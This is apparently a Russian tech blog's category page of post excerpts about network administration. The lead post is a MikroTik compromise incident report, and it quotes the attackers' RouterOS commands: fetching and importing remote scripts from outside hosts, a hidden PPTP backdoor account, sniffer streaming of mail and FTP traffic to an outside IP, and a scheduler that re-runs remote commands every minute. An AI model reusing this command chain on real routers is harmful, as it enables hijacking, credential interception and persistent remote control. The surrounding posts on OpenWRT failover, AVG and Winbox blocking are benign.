Рейтинг
0.00
avatar

Интернет

Подробнее ↓

После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

Резервный 3G 4G канал для OPENWRT

Интернет
модули
usb-modeswitch
kmod-usb-net-cdc-ether

Существуют такие моменты когда постоянный доступ к сети Интернет просто необходим, например для платёжных терминалов, ведь клиент всегда прав, а если он неможет оплатить картой то это уже беда, клиент потерян, негатив!
Для поддержания доступа к сети Интертет обычно используют резервный канал. Я использую как резервный мобильный Интернет через 3G-4G свисток) Обычный роутер с неофициальной прошивкой OPENWRT.
Можно было бы написать скрипт проверки доступности каналов, но проще использовать готовый вариант под названием mwan3
mwan3 буду ставить для ОПЕНВРТ 15.05.1
opkg update
opkg install ip iptables-mod-conntrack-extra iptables-mod-ipopt
opkg install mwan3_1.2-17_all.ipk

Installing mwan3 (1.6-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/mwan3_1.6-2_all.ipk.
Installing ip (4.0.0-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ip_4.0.0-1_ar71xx.ipk.
Installing ipset (6.24-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/ipset_6.24-1_ar71xx.ipk.
Installing kmod-ipt-ipset (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipset_3.18.23-1_ar71xx.ipk.
Installing kmod-nfnetlink (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-nfnetlink_3.18.23-1_ar71xx.ipk.
Installing libmnl (1.0.3-2) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libmnl_1.0.3-2_ar71xx.ipk.
Installing iptables-mod-conntrack-extra (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-conntrack-extra_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-conntrack-extra (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-conntrack-extra_3.18.23-1_ar71xx.ipk.
Installing iptables-mod-ipopt (1.4.21-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/iptables-mod-ipopt_1.4.21-1_ar71xx.ipk.
Installing kmod-ipt-ipopt (3.18.23-1) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/kmod-ipt-ipopt_3.18.23-1_ar71xx.ipk.
Configuring ip.
Configuring kmod-nfnetlink.
Configuring libmnl.
Configuring kmod-ipt-conntrack-extra.
Configuring kmod-ipt-ipopt.
Configuring iptables-mod-ipopt.
Configuring kmod-ipt-ipset.
Configuring ipset.
Configuring iptables-mod-conntrack-extra.
Configuring mwan3.

luci-app-mwan3

Installing luci-app-mwan3 (1.4-3) to root…
Downloading downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/luci-app-mwan3_1.4-3_all.ipk.
Configuring luci-app-mwan3.

Для прохождения трафика PPTP установить kmod-nf-nathelper-extra
Для того чтобы появился в интрефейсах ВПН ppp-mod-pptp

Правда и лож антивируса AVG (Мифы антивируса)

Интернет
Установил бесплатный антивирус AVG ПК.
Потестировал, постоянно вылазит всякая хрень, то пытаются оптимизировать то усилить защиту сообщения на дурачка,

ЗАДАЛБАЛ ЭТОТ AVG.

Вдруг откуда не возьмись появилась очередная утка от этого антивируса AVG.
Явно враньё, AVG Вы возможно считаете всех дураками?
Да и написано неграмотно — просто отвратительно.
Собственно предупреждение
Найдены 4 проблемы с конфиденциальностью
Как AVG пудрит голову и враньё

Читать дальше

Дополнительная защита микротик, бан dude connect from (додики)

Интернет

denied winbox/dude connect from

— данное сообщение в логах микротика возникает тогда, когда кто-то пытается получить доступ через WINBOX, но его ip адрес не прописан в сервисе winboxa. Т.е. этот вероятный злоумышленник или робот пытается получить доступ, а доступа нет. С одной стороны не стоит сразу паниковать и думать что Вас ломают, но если лезут значит надо принимать меры ещё на шаг раньше.

После неоднократных взломов Микротика и постоянно образующихся новых дыр в безопасности устройства решил собрать список негодяев пытающихся заломиться через winbox несмотря на то что сервис открыт только для определённых ip адресов. Все эти негодяи попадают в логи с сообщениями
denied winbox/dude connect from

Читать дальше

на 1 августа 2018 Более 200 000 маршрутизаторов MikroTik заражены

Интернет
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
микротик взломан майнинг
Читать дальше